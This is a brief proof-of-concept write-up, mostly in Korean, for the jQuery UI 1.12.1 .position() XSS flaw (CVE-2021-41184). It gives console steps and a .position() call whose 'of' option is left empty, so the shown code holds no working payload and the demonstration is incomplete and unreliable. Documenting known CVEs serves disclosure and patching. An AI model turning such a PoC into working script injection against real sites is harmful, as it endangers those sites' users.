
CVE-2021-41184에 대한 개념 증명 익스플로잇, jQuery UI의 .position() 유틸리티에서 발생하는 크로스 사이트 스크립팅 (XSS) 취약점으로, 버전 1.12.1을 대상으로 합니다.
Exploit Medium CVE-2021-41184 XSS in the of option of the .position() util
1.1 https://www.website.com/_js/jquery/jquery-ui-1.12.1/jquery-ui.min.js
------------------------------------------------개념 증명---------------------------------------------------------------
URL 열기
검사 열기
사이트 요소에서 ID 찾기
3.1 #ID
콘솔 탭으로 이동
3.1에서 선택한 ID로 스크립트 주입
5.1 스크립트
$("#id").position( {
my: "center",
at: "right bottom",
of: "",
collision: "none"
});